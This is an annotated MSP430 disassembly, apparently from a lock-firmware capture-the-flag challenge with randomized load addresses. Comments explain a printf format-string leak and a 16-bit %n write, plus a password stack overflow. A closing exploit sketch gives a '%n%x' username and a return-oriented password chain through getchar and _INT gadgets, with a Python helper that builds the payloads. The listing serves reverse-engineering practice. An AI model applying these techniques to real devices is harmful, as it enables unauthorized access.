.msp430
; Reset / C-runtime startup for the MSP430 image.  Everything between 0x4400
; and 0x53ff is later copied to a random base by main and then wiped, so the
; absolute addresses in this listing are only meaningful until that happens.

0010 <__trap_interrupt>
0010: 3041 ret ; every INT helper in this image ends with `call #0x10`; this just returns
               ; (the interrupt flagged in sr is serviced by the platform, not by code shown here)

4400 <__init_stack>
4400: 3140 0044 mov #0x4400, sp ; initial stack grows down from 0x4400 (directly below the code)

4404 <__low_level_init>
4404: 1542 5c01 mov &0x015c, r5
4408: 75f3 and.b #-0x1, r5 ; byte op: keeps the low byte of r5, clears the high byte
440a: 35d0 085a bis #0x5a08, r5 ; r5 = 0x5a08 | low byte; written back to 0x015c in the loops below
                                ; (0x5a.. looks like a password-guarded control-register write; purpose not shown here)

440e <__do_copy_data>
440e: 3f40 0000 clr r15 ; .data size is 0 ...
4412: 0f93 tst r15
4414: 0724 jz $+0x10 <__do_clear_bss+0x0> ; ... so the copy loop below never executes
4416: 8245 5c01 mov r5, &0x015c
441a: 2f83 decd r15
441c: 9f4f 704a 0024 mov 0x4a70(r15), 0x2400(r15) ; would copy the .data image at 0x4a70 (all zeroes, per the original note) to 0x2400
4422: f923 jnz $-0xc <__do_copy_data+0x8>

4424 <__do_clear_bss>
4424: 3f40 3200 mov #0x32, r15 ; zero 0x32 bytes of .bss: 0x2400..0x2431
4428: 0f93 tst r15
442a: 0624 jz $+0xe
442c: 8245 5c01 mov r5, &0x015c ; the control write from __low_level_init, repeated once per byte
4430: 1f83 dec r15
4432: cf43 0024 mov.b #0x0, 0x2400(r15)
4436: fa23 jnz $-0xa <__do_clear_bss+0x8>

rand_base_0x038: ; main lives at rand_base + 0x38 once relocated
; ----------------------------------------------------------------------
; main: builds a randomized copy of the 0x4400..0x53ff image, moves the
; stack to a second random location and transfers control into the copy.
;   rand_base = (rand() & 0x7ffe) + 0x6000            -> 0x6000..0xdffe, word aligned, 14 bits of entropy
;   sp        = rand_base - (rand() & 0xffe) + 0xff00  -> 0x100..0x10fe below rand_base (mod 2^16)
; Labels of the form rand_base_0xNNN / aslr_base_0xNNN give the offset of a
; routine inside the relocated copy; the exploit notes further down use them.
; ----------------------------------------------------------------------
main:
4438: b012 1c4a call #0x4a1c ; rand() -> r15
443c: 0b4f mov r15, r11
443e: 3bf0 fe7f and #0x7ffe, r11
4442: 3b50 0060 add #0x6000, r11 ; r11 = rand_base
4446: b012 1c4a call #0x4a1c ; second rand(), used only for the stack
444a: 0a4f mov r15, r10
; memcpy(rand_base, 0x4400, 0x1000): relocate the whole program image
444c: 3012 0010 push #0x1000
4450: 3012 0044 push #0x4400
4454: 0b12 push r11
4456: b012 e849 call #0x49e8 <_memcpy>
445a: 3150 0600 add #0x6, sp
445e: 0f4a mov r10, r15
4460: 3ff0 fe0f and #0xffe, r15
4464: 0e4b mov r11, r14
4466: 0e8f sub r15, r14
4468: 3e50 00ff add #0xff00, r14 ; r14 = rand_base - (r10 & 0xffe) + 0xff00 = new sp
446c: 0d4b mov r11, r13
446e: 3d50 5c03 add #0x35c, r13 ; r13 = rand_base + 0x35c = relocated aslr_main
4472: 014e mov r14, sp ; switch stacks; the old stack is simply abandoned
4474: 0f4b mov r11, r15 ; arg: rand_base
4476: 8d12 call r13
; NOTE(review): with rand_base near 0x6000 and a large second draw the new sp
; lands inside 0x4400..0x53ff (e.g. 0x6000 - 0xffe + 0xff00 = 0x4f02), the
; range __delete_code_loop zeroes while frames live there - looks like a
; latent crash on unlucky draws; confirm against the platform.

rand_base_0x078: <__stop_progExec__>
4478: 32d0 f000 bis #0xf0, sr ; set the MSP430 low-power/CPU-off bits, then spin forever
447c: fd3f jmp $-0x4 <__stop_progExec__+0x0>

rand_base_0x07e: <__ctors_end>
447e: 3040 6e4a br #0x4a6e <_unexpected_>

rand_base_0x082: <_aslr_main>
; _aslr_main(r15 = rand_base)
; Runs from the relocated copy, hence no absolute addresses.  Frame after the prologue:
;   sp+0x0  local, never initialised (it is also the first vararg printf sees)
;   sp+0x2  rand_base + 0x36a = address of the relocated printf
;   sp+0x4  start of the password buffer (0x14 bytes requested, see __get_pass_string)
;   sp+0x8  saved r10
;   sp+0xa  saved r11
;   sp+0xc  return address into aslr_main
; Two attacker-facing defects are visible in this routine:
;   1. the username read into 0x2426 is handed to printf as the FORMAT string,
;      and this printf implements %x and %n (leak + arbitrary 16-bit write);
;   2. the password getsn reads 0x14 bytes at sp+4, but only 8 bytes separate
;      that slot from the saved return address -> plain stack overflow.
; The "Wrong!" message is printed unconditionally; the INT 0x7e result is never examined.
_aslr_main: ;! args: r15
push r11
push r10
sub #0x8, sp ; 8 bytes of locals
mov r15, r12
add #0x36a, r12 ; r12 = relocated printf
mov r12, 0x2(sp) ; kept on the stack - this is the word a %x leak recovers
clr r14
; Wipe the original image at 0x4400..0x53ff so only the randomized copy remains
__delete_code_loop:
mov.b #0x0, 0x4400(r14)
inc r14
cmp #0x1000, r14
jnz $-0xa <__delete_code_loop>
; "Username (8 char max):" -> 0x2402..0x2418, NUL terminated
mov.b #0x55, &0x2402 ; 'U'
mov.b #0x73, &0x2403 ; 's'
mov.b #0x65, &0x2404 ; 'e'
mov.b #0x72, &0x2405 ; 'r'
mov.b #0x6e, &0x2406 ; 'n'
mov.b #0x61, &0x2407 ; 'a'
mov.b #0x6d, &0x2408 ; 'm'
mov.b #0x65, &0x2409 ; 'e'
mov.b #0x20, &0x240a ; ' '
mov.b #0x28, &0x240b ; '('
mov.b #0x38, &0x240c ; '8'
mov.b #0x20, &0x240d ; ' '
mov.b #0x63, &0x240e ; 'c'
mov.b #0x68, &0x240f ; 'h'
mov.b #0x61, &0x2410 ; 'a'
mov.b #0x72, &0x2411 ; 'r'
mov.b #0x20, &0x2412 ; ' '
mov.b #0x6d, &0x2413 ; 'm'
mov.b #0x61, &0x2414 ; 'a'
mov.b #0x78, &0x2415 ; 'x'
mov.b #0x29, &0x2416 ; ')'
mov.b #0x3a, &0x2417 ; ':'
mov.b #0x0, &0x2418  ; NUL
mov #0x17, &0x2400 ; length 23 stored at 0x2400; the print loop below walks to the NUL instead
mov #0x2402, r14
clr r11
jmp $+0x22 ; enter at print_uname_string
; Inline puts(): for every byte, INT 0 (putchar) with the char in r13.
; Calling convention used throughout: push args, push pc, push sr,
; sr = (int_no << 8) | 0x8000, call #0x10, pop sr, drop 8 bytes.
__print_uname_string_l:
inc r14
sxt r13
push r11
push r13
push r11
push pc
push sr
mov r11, r15 ; r11 = 0 -> interrupt number 0
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
print_uname_string:
mov.b @r14, r13
tst.b r13
jnz $-0x24 <__print_uname_string_l>
; putchar('\n')
__print_line_feed__1: ; putchar
clr r14
mov #0xa, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
; putchar('>') twice: r13 = 0xa + 0x34 = 0x3e = '>'
__print_less_than__1: ; putchar
add #0x34, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
__print_less_than__2: ; putchar
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
;! getsn(0x2426, 8): up to 8 bytes of user input -> 0x2426..0x242d
__get_uname_string: ; getsn
mov #0x8, r10 ; len
mov #0x2426, r11 ; buf
mov #0x2, r13 ; INT 2
push r10
push r11
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10 ; INT (2, 0x2426, 0x8)
pop sr
add #0x8, sp
mov.b r14, &0x242e ; r14 is still 0: NUL-terminate right after the 8 input bytes
;! printf(0x2426): the user-supplied username IS the format string.
;  r12 = rand_base + 0x36a (computed in the prologue).  See printf below for %x / %n.
push r11
call r12 ;! PRINTF???
incd sp
; Clear the username buffer 0x2426..0x2431
mov r11, r15
jmp $+0x8
__clsb_a_loop:
mov.b #0x0, 0x0(r15)
inc r15
clsb_a:
cmp #0x2432, r15
jnz $-0xa <__clsb_a_loop>
;! "\nPassword:" -> 0x2402..0x240c.  The 0x0a at 0x2402 is a leading newline,
;  not a length: the print loop starts at 0x2402 and emits it.
mov.b #0xa, &0x2402 ; '\n'
mov.b #0x50, &0x2403 ; 'P'
mov.b #0x61, &0x2404 ; 'a'
mov.b #0x73, &0x2405 ; 's'
mov.b #0x73, &0x2406 ; 's'
mov.b #0x77, &0x2407 ; 'w'
mov.b #0x6f, &0x2408 ; 'o'
mov.b #0x72, &0x2409 ; 'r'
mov.b #0x64, &0x240a ; 'd'
mov.b #0x3a, &0x240b ; ':'
mov.b #0x0, &0x240c  ; NUL
mov #0x2402, r14 ; r14 = string cursor
; Inline puts("\nPassword:")
clr r12
jmp $+0x22
__print_passwd_string:
inc r14
sxt r13
push r12
push r13
push r12
push pc
push sr
mov r12, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10 ; INT (0, r13)
pop sr
add #0x8, sp
print_passwd_string:
mov.b @r14, r13
tst.b r13
jnz $-0x24 <__print_passwd_string>
; putchar('\n')
clr r14
mov #0xa, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
;! getsn(sp+4, 0x14): 20 bytes are read into the frame, but only 8 bytes
;  (sp+4..sp+0xb: 4 local bytes, saved r10, saved r11) sit in front of the
;  return address at sp+0xc.  Bytes 9-10 of the password overwrite the return
;  address and bytes 11-20 land above it - stack-based buffer overflow.
__get_pass_string: ; getsn
mov sp, r11
add #0x4, r11 ; r11 = buffer = sp+4 (also the password pointer passed to INT 0x7e below)
mov #0x14, r12 ; len = 20
mov #0x2, r13
push r12
push r11
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10 ; INT (2, sp+4, 0x14)
0x2aa: pop sr
add #0x8, sp
;! Check password with HSM-2: INT 0x7e (r13 = 2 + 0x7c) with (r12 = sp -> result slot,
;  r11 = password).  Nothing below reads the result slot, so the outcome only
;  matters through whatever the interrupt itself does.
__check_password: ; conditional_unlock_door
add #0x7c, r13
mov sp, r12
push r12
push r11
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
; "Wrong!" -> 0x2402..0x2408, printed unconditionally (no branch on the INT 0x7e result)
mov.b #0x57, &0x2402 ; 'W'
mov.b #0x72, &0x2403 ; 'r'
mov.b #0x6f, &0x2404 ; 'o'
mov.b #0x6e, &0x2405 ; 'n'
mov.b #0x67, &0x2406 ; 'g'
mov.b #0x21, &0x2407 ; '!'
mov.b r14, &0x2408 ; Hah, nice hint: r14 still 0 -> NUL terminator
mov #0x7, &0x2400 ; length: 7 (again not consulted by the print loop)
; Inline puts("Wrong!")
mov #0x2402, r13
jmp $+0x22 <_aslr_main+0x2a2>
__print_wrong_string: ; puts ("Wrong!")
inc r13
sxt r12
push r14
push r12
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
print_wrong_string:
mov.b @r13, r12
tst.b r12
jnz $-0x24 <_aslr_main+0x282>
; putchar('\n')
clr r14
mov #0xa, r13
push r14
push r13
push r14
push pc
push sr
mov r14, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
; Epilogue: r15 = sp + 2 (pointer into the frame) and unwind.
; The `ret` here pops whatever the 20-byte password left at sp+0xc.
mov sp, r14
incd r14
push r14
pop r15
4754: add #0x8, sp
pop r10
pop r11
ret

rand_base_0x35c:
; aslr_main(r15 = rand_base): call _aslr_main(rand_base) at rand_base+0x82, then halt the CPU.
aslr_main:
475c: 0e4f mov r15, r14
475e: 3e50 8200 add #0x82, r14
4762: 8e12 call r14
4764: 32d0 f000 bis #0xf0, sr ; SR |= 0x00f0: low-power/CPU-off bits, same as __stop_progExec__
4768: 3041 ret

aslr_base_0x36a:
; printf(fmt, ...) - all arguments on the stack (fmt at 0x2(r4), varargs from r4+4).
; Pass 1 counts conversions in fmt ("%%" counts as none) -> r14.
; Then 2*r14+2 bytes are reserved on the stack and the r14 vararg words are
; copied there; r11 walks that copy one word per conversion.
; Pass 2 emits: plain chars (INT 0), "%%" -> '%', "%s" -> string, "%x" -> 4 hex
; digits, "%n" -> writes r12 (characters emitted so far) as a 16-bit word to
; the pointer argument.  Any other conversion consumes an argument and prints nothing.
; With an attacker-controlled fmt this is an arbitrary stack read (%x) and an
; arbitrary 16-bit write (%n).  Register roles: r10 fmt cursor, r11 arg cursor,
; r12 chars printed, r6 = 9 (hex digit threshold), r7 = '%', r4 frame pointer.
printf:
; Save registers
push r11
push r10
push r9
push r8
push r7
push r6
push r4
; r4 points at the return address (entry sp); arguments sit above it
mov sp, r4
add #0xe, r4
; Reserve 2 bytes, fetch fmt, and remember sp so the epilogue can discard the vararg copy
decd sp
mov 0x2(r4), r10
mov sp, -0x10(r4)
mov r10, r15
clr r14
; ---- pass 1: count conversions into r14 (the <label> hints here follow the original listing) ----
jmp $+0x18 <__target_1> +3a
inc r15
cmp.b #0x25, r13
jnz $+0x10 <__target_1> +3a
cmp.b @r15, r13 ; "%%": skip the second '%' without counting
jnz $+0x8 <__target_2> +36
__target_4:
inc r15
clr r13
jmp $+0x4 <__target_3> +38
__target_2:
mov #0x1, r13
add r13, r14 ; one more conversion
__target_3:
mov.b @r15, r13
tst.b r13
jnz $-0x1a <__target_4> +24
; ---- copy r14 vararg words from r4+4 into a fresh stack array (r11) ----
mov r14, r15
add r15, r15
incd r15
sub r15, sp
mov sp, r11
mov r4, r12
add #0x4, r12
mov sp, r15
clr r13
jmp $+0xc
mov @r12, 0x0(r15)
inc r13
incd r15
incd r12
cmp r14, r13
jl $-0xc
; ---- pass 2: walk fmt (r10) and emit ----
clr r12 ; chars printed so far (this is what %n writes)
mov #0x9, r6
mov r12, r13
mov #0x25, r7 ; '%'
jmp $+0xf8
inc r10
cmp.b #0x25, r15
jz $+0x26 ; '%' -> conversion handling
inc r12
__target_1: ; ordinary character: putchar(r15)
mov.b r15, r14
sxt r14
push r13
push r14
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
jmp $+0xcc
; conversion: r14 = the character after '%'
mov.b @r10, r14
cmp.b r15, r14
jnz $+0x22
; "%%" -> emit '%' (r7), no argument consumed
inc r12
push r13
push r7
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
jmp $+0xa2
cmp.b #0x73, r14 ; 's'
jnz $+0x32
; "%s": r14 = string pointer from the next argument; emit until NUL
mov @r11, r14
clr r8
jmp $+0x24
inc r12
inc r14
sxt r9
push r8
push r9
push r8
push pc
push sr
mov r8, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
mov.b @r14, r9
tst.b r9
jnz $-0x26
jmp $+0x6c
cmp.b #0x78, r14 ; 'x'
jnz $+0x5a
; "%x": r14 = next argument; print its 4 nibbles, high to low
mov @r11, r14
mov #0x4, r9
jmp $+0x4a
mov r14, r15
swpb r15
and #0xff, r15
clrc
rrc r15
rra r15
rra r15
rra r15 ; r15 = top nibble of r14
cmp r15, r6
jl $+0xa ; nibble > 9 -> 'a'..'f'
mov r15, r8
add #0x30, r8 ; '0'..'9'
jmp $+0x8
mov r15, r8
add #0x57, r8 ; 'a'..'f'
push r13
push r8
push r13
push pc
push sr
mov r13, r15
swpb r15
mov r15, sr
bis #0x8000, sr
call #0x10
pop sr
add #0x8, sp
add r14, r14
add r14, r14
add r14, r14
add r14, r14 ; r14 <<= 4
add #-0x1, r9
cmp #-0x1, r9
jnz $-0x4c
add #0x4, r12 ; 4 characters emitted
jmp $+0xe
cmp.b #0x6e, r14 ; 'n'
jnz $+0x8
; "%n": *(next argument) = r12 - a 16-bit write to an attacker-chosen address when fmt is untrusted
mov @r11, r15
mov r12, 0x0(r15)
incd r11 ; next argument
inc r10
mov.b @r10, r15
tst.b r15
jnz $-0xfa
; epilogue: drop the vararg copy, restore registers
mov -0x10(r4), sp
incd sp
pop r4
pop r6
pop r7
pop r8
pop r9
pop r10
pop r11
ret

;;; Exploit sketch from the original notes (kept verbatim below), as far as this listing supports it:
;;;   username = "%n%x": %n consumes the first vararg (the uninitialised local at
;;;     _aslr_main's sp+0) as a write target, %x prints the second vararg, which is
;;;     the stored rand_base+0x36a, so rand_base = printed value - 0x36a.
;;;   password = "AAAA1011"        fills sp+4..sp+0xb (locals, saved r10, saved r11)
;;;            + rand_base+0x56c   return address -> tail of getchar at 0x496c:
;;;                                  mov.b @sp, r15 ; sxt r15 ; incd sp ; ret
;;;            + "7f7f"            the byte that tail loads into r15 (0x7f), then skipped by incd sp
;;;            + rand_base+0x4f4   second return -> tail of _INT at 0x48f4:
;;;                                  swpb r15 ; mov r15, sr ; bis #0x8000, sr ; call #0x10  => raises INT 0x7f
;;;   (INT 0x7f is presumably the platform's unconditional-unlock interrupt; only 0x7e is referenced in this listing)
;;; def bypass (printf_loc): aslr_base = printf_loc - 0x36a; print(b'%n%x'.hex()) print(f"{b'AAAA1011'.hex()}{aslr_base+0x56c:x}7f7f{aslr_base+0x4f4:x}") ;;;

aslr_base_0x4ec: <_INT>
; _INT(): interrupt number taken from the stack at 0x2(sp); no arguments pushed.
; The tail from 0x48f4 on is a useful gadget: it raises whatever interrupt r15 holds.
_INT:
48ec: 1e41 0200 mov 0x2(sp), r14
48f0: 0212 push sr
48f2: 0f4e mov r14, r15
aslr_base_0x4f4:
48f4: 8f10 swpb r15
48f6: 024f mov r15, sr
48f8: 32d0 0080 bis #0x8000, sr
48fc: b012 1000 call #0x10
4900: 3241 pop sr
4902: 3041 ret

aslr_base_0x504:
; INT(r15 = number, r14, r13 = args): generic 2-argument interrupt wrapper
INT:
4904: 0c4f mov r15, r12
4906: 0d12 push r13
4908: 0e12 push r14
490a: 0c12 push r12
490c: 0012 push pc
490e: 0212 push sr
4910: 0f4c mov r12, r15
4912: 8f10 swpb r15
4914: 024f mov r15, sr
4916: 32d0 0080 bis #0x8000, sr
491a: b012 1000 call #0x10
491e: 3241 pop sr
4920: 3152 add #0x8, sp
4922: 3041 ret

aslr_base_0x524:
; putchar(r15 = char): INT 0; returns the char in r15
putchar:
4924: 0e4f mov r15, r14
4926: 0d43 clr r13
4928: 0d12 push r13
492a: 0e12 push r14
492c: 0d12 push r13
492e: 0012 push pc
4930: 0212 push sr
4932: 0f4d mov r13, r15
4934: 8f10 swpb r15
4936: 024f mov r15, sr
4938: 32d0 0080 bis #0x8000, sr
493c: b012 1000 call #0x10
4940: 3241 pop sr
4942: 3152 add #0x8, sp
4944: 0f4e mov r14, r15
4946: 3041 ret

aslr_base_0x548:
; getchar(): INT 1 into a 1-byte stack slot; returns the sign-extended byte in r15.
; The tail at 0x496c (= aslr_base+0x56c) loads a byte from the stack into r15 and returns.
getchar:
4948: 2183 decd sp
494a: 0d43 clr r13
494c: 1e43 mov #0x1, r14
494e: 0c41 mov sp, r12
4950: 0d12 push r13
4952: 0c12 push r12
4954: 0e12 push r14
4956: 0012 push pc
4958: 0212 push sr
495a: 0f4e mov r14, r15
495c: 8f10 swpb r15
495e: 024f mov r15, sr
4960: 32d0 0080 bis #0x8000, sr
4964: b012 1000 call #0x10
4968: 3241 pop sr
496a: 3152 add #0x8, sp
496c: 6f41 mov.b @sp, r15
496e: 8f11 sxt r15
4970: 2153 incd sp
4972: 3041 ret

aslr_base_0x574:
; getsn(r15 = buf, r14 = len): INT 2.  No bounds relation between buf and len is
; enforced here; the caller is responsible for len fitting the buffer.
getsn:
4974: 0d4f mov r15, r13
4976: 2c43 mov #0x2, r12
4978: 0e12 push r14
497a: 0d12 push r13
497c: 0c12 push r12
497e: 0012 push pc
4980: 0212 push sr
4982: 0f4c mov r12, r15
4984: 8f10 swpb r15
4986: 024f mov r15, sr
4988: 32d0 0080 bis #0x8000, sr
498c: b012 1000 call #0x10
4990: 3241 pop sr
4992: 3152 add #0x8, sp
4994: 3041 ret

aslr_base_0x596:
; puts(r15 = str): INT 0 per byte until NUL, then a newline; returns 0 in r15
puts:
4996: 0e4f mov r15, r14
4998: 0c43 clr r12
499a: 103c jmp $+0x22
499c: 1e53 inc r14
499e: 8d11 sxt r13
49a0: 0c12 push r12
49a2: 0d12 push r13
49a4: 0c12 push r12
49a6: 0012 push pc
49a8: 0212 push sr
49aa: 0f4c mov r12, r15
49ac: 8f10 swpb r15
49ae: 024f mov r15, sr
49b0: 32d0 0080 bis #0x8000, sr
49b4: b012 1000 call #0x10
49b8: 3241 pop sr
49ba: 3152 add #0x8, sp
49bc: 6d4e mov.b @r14, r13
49be: 4d93 tst.b r13
49c0: ed23 jnz $-0x24
49c2: 0e43 clr r14
49c4: 3d40 0a00 mov #0xa, r13
49c8: 0e12 push r14
49ca: 0d12 push r13
49cc: 0e12 push r14
49ce: 0012 push pc
49d0: 0212 push sr
49d2: 0f4e mov r14, r15
49d4: 8f10 swpb r15
49d6: 024f mov r15, sr
49d8: 32d0 0080 bis #0x8000, sr
49dc: b012 1000 call #0x10
49e0: 3241 pop sr
49e2: 3152 add #0x8, sp
49e4: 0f4e mov r14, r15
49e6: 3041 ret

aslr_base_0x5e8: <_memcpy>
; memcpy(dst, src, len) - stack arguments: 0x2(sp) = dst, 0x4(sp) = src, 0x6(sp) = len.
; Byte copy; len = 0 copies nothing.
memcpy:
49e8: 1c41 0600 mov 0x6(sp), r12
49ec: 0f43 clr r15
49ee: 093c jmp $+0x14 <_memcpy+0x1a>
49f0: 1e41 0200 mov 0x2(sp), r14
49f4: 0e5f add r15, r14
49f6: 1d41 0400 mov 0x4(sp), r13
49fa: 0d5f add r15, r13
49fc: ee4d 0000 mov.b @r13, 0x0(r14)
4a00: 1f53 inc r15
4a02: 0f9c cmp r12, r15
4a04: f523 jnz $-0x14 <_memcpy+0x8>
4a06: 3041 ret

aslr_base_608: <_bzero>
; bzero(r15 = ptr, r14 = len): byte loop
bzero:
4a08: 0d43 clr r13
4a0a: 053c jmp $+0xc <_bzero+0xe>
4a0c: 0c4f mov r15, r12
4a0e: 0c5d add r13, r12
4a10: cc43 0000 mov.b #0x0, 0x0(r12)
4a14: 1d53 inc r13
4a16: 0d9e cmp r14, r13
4a18: f923 jnz $-0xc <_bzero+0x4>
4a1a: 3041 ret

aslr_base_0x61c:
; rand(): INT 0x20 with no arguments; result comes back in r15 (the final mov is a no-op)
rand:
4a1c: 0e43 clr r14
4a1e: 3d40 2000 mov #0x20, r13
4a22: 0e12 push r14
4a24: 0e12 push r14
4a26: 0d12 push r13
4a28: 0012 push pc
4a2a: 0212 push sr
4a2c: 0f4d mov r13, r15
4a2e: 8f10 swpb r15
4a30: 024f mov r15, sr
4a32: 32d0 0080 bis #0x8000, sr
4a36: b012 1000 call #0x10
4a3a: 3241 pop sr
4a3c: 3152 add #0x8, sp
4a3e: 0f4f mov r15, r15
4a40: 3041 ret

aslr_base_0x642:
; conditional_unlock_door(r15 = password): INT 0x7e with (ptr to a 1-word stack slot, password).
; Always returns 0 in r15 - the stack slot the interrupt fills is discarded unread,
; so callers cannot learn the verdict from this wrapper.
conditional_unlock_door:
4a42: 2183 decd sp
4a44: 0e4f mov r15, r14
4a46: 3d40 7e00 mov #0x7e, r13
4a4a: 0c41 mov sp, r12
4a4c: 0c12 push r12
4a4e: 0e12 push r14
4a50: 0d12 push r13
4a52: 0012 push pc
4a54: 0212 push sr
4a56: 0f4d mov r13, r15
4a58: 8f10 swpb r15
4a5a: 024f mov r15, sr
4a5c: 32d0 0080 bis #0x8000, sr
4a60: b012 1000 call #0x10
4a64: 3241 pop sr
4a66: 3152 add #0x8, sp
4a68: 0f43 clr r15
4a6a: 2153 incd sp
4a6c: 3041 ret

4a6e <_unexpected_>
4a6e: 0013 reti pc ; unexpected-interrupt handler: just return from interrupt